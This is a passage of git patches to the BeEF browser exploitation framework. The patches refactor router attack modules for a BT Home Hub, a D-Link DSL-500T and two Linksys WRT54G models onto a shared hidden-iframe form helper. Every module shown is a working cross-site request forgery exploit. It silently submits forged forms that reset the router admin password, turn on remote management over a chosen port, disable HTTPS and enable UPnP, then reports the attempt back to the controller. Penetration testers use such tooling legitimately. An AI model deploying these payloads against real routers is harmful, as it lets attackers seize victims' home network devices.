@@ -17,39 +17,16 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var bt_home_hub_iframe = beef.dom.createInvisibleIframe();
- var form = document.createElement('form');
- form.setAttribute('action', gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5");
- form.setAttribute('method', 'post');
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '0');
- input.setAttribute('value', '31');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '1');
- input.setAttribute('value', '');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '30');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- bt_home_hub_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
+ [{'type':'hidden', 'name':'0', 'value':'31'} ,
+ {'type':'hidden', 'name':'1', 'value':''},
+ {'type':'hidden', 'name':'30', 'value':passwd}]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
- delete form;
document.body.removeChild(bt_home_hub_iframe);
}
setTimeout("cleanup()", 15000);
From f84d34ab86401eba8d3171e6970f3092a2ec4dd4 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 9 May 2012 14:26:05 +0100
Subject: [PATCH 19/21] Updated dlink_dsl500t_xsrf to use the new
beef.dom.createIframeXsrfForm JS api
---
modules/router/dlink_dsl500t_csrf/command.js | 49 +++-----------------
1 file changed, 7 insertions(+), 42 deletions(-)
diff --git a/modules/router/dlink_dsl500t_csrf/command.js b/modules/router/dlink_dsl500t_csrf/command.js
index 8616d5acf..ae1c98e23 100644
--- a/modules/router/dlink_dsl500t_csrf/command.js
+++ b/modules/router/dlink_dsl500t_csrf/command.js
@@ -17,48 +17,13 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "/cgi-bin/webcm";
-
- var dsl500t_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'getpage');
- input.setAttribute('value', '../html/tools/usrmgmt.htm');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/username');
- input.setAttribute('value', 'admin');
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/password');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/password_confirm');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'security:settings/idle_timeout');
- input.setAttribute('value', '30');
- form.appendChild(input);
-
- dsl500t_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+ [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
+ {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
+ {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
+ {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
+ {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
From f361e2ac786d35b8f499d2d046450e54ecf12507 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 9 May 2012 14:35:53 +0100
Subject: [PATCH 20/21] Updated lynksys_wrt54g_xsrf to use the new
beef.dom.createIframeXsrfForm JS api
---
.../router/linksys_wrt54g2_csrf/command.js | 98 +++----------------
1 file changed, 14 insertions(+), 84 deletions(-)
diff --git a/modules/router/linksys_wrt54g2_csrf/command.js b/modules/router/linksys_wrt54g2_csrf/command.js
index 036a25aab..0f362bf89 100644
--- a/modules/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/router/linksys_wrt54g2_csrf/command.js
@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "Manage.tri";
-
- var wrt54g2_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_USE_HTTP');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_HTTP');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_HTTP_S');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORDMOD');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORD');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PASSWORD_CONFIRM');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '_http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_WLFILTER');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_REMOTE');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_PORT');
- input.setAttribute('value', port);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'MANAGE_UPNP');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'layout');
- input.setAttribute('value', 'en');
- form.appendChild(input);
-
- wrt54g2_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var wrt54g2_iframe = beef.dom.createIframeXsrfForm(gateway + "Manage.tri", "POST",
+ [{'type':'hidden', 'name':'MANAGE_USE_HTTP', 'value':'0'} ,
+ {'type':'hidden', 'name':'MANAGE_HTTP', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_HTTP_S', 'value':'0'},
+ {'type':'hidden', 'name':'MANAGE_PASSWORDMOD', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_PASSWORD', 'value':passwd},
+ {'type':'hidden', 'name':'MANAGE_PASSWORD_CONFIRM', 'value':passwd},
+ {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_WLFILTER', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_REMOTE', 'value':'1'},
+ {'type':'hidden', 'name':'MANAGE_PORT', 'value':port},
+ {'type':'hidden', 'name':'MANAGE_UPNP', 'value':'1'},
+ {'type':'hidden', 'name':'layout', 'value':'en'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
From 46a19ee0b9921704d4b7d7c47c549fdf42344ac8 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Wed, 9 May 2012 14:39:18 +0100
Subject: [PATCH 21/21] Updated lynksys_wrt54g_xsrf (second one) to use the new
beef.dom.createIframeXsrfForm JS api
---
modules/router/linksys_wrt54g_csrf/command.js | 98 +++----------------
1 file changed, 14 insertions(+), 84 deletions(-)
diff --git a/modules/router/linksys_wrt54g_csrf/command.js b/modules/router/linksys_wrt54g_csrf/command.js
index 456922d35..d18e65898 100644
--- a/modules/router/linksys_wrt54g_csrf/command.js
+++ b/modules/router/linksys_wrt54g_csrf/command.js
@@ -18,90 +18,20 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var target = gateway + "manage.tri";
-
- var wrt54g_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', target);
- form.setAttribute('method', 'post');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'remote_mgt_https');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'https_enable');
- input.setAttribute('value', 0);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'PasswdModify');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_passwd');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_passwdConfirm');
- input.setAttribute('value', passwd);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', '_http_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'web_wl_filter');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'remote_management');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'http_wanport');
- input.setAttribute('value', port);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'upnp_enable');
- input.setAttribute('value', 1);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'layout');
- input.setAttribute('value', 'en');
- form.appendChild(input);
-
- wrt54g_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var wrt54g_iframe = beef.dom.createIframeXsrfForm(gateway + "manage.tri", "POST",
+ [{'type':'hidden', 'name':'remote_mgt_https', 'value':'0'} ,
+ {'type':'hidden', 'name':'http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'https_enable', 'value':'0'},
+ {'type':'hidden', 'name':'PasswdModify', 'value':'1'},
+ {'type':'hidden', 'name':'http_passwd', 'value':passwd},
+ {'type':'hidden', 'name':'http_passwdConfirm', 'value':passwd},
+ {'type':'hidden', 'name':'_http_enable', 'value':'1'},
+ {'type':'hidden', 'name':'remote_management', 'value':'1'},
+ {'type':'hidden', 'name':'web_wl_filter', 'value':'1'},
+ {'type':'hidden', 'name':'http_wanport', 'value':port},
+ {'type':'hidden', 'name':'upnp_enable', 'value':'1'},
+ {'type':'hidden', 'name':'layout', 'value':'en'}
+ ]);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");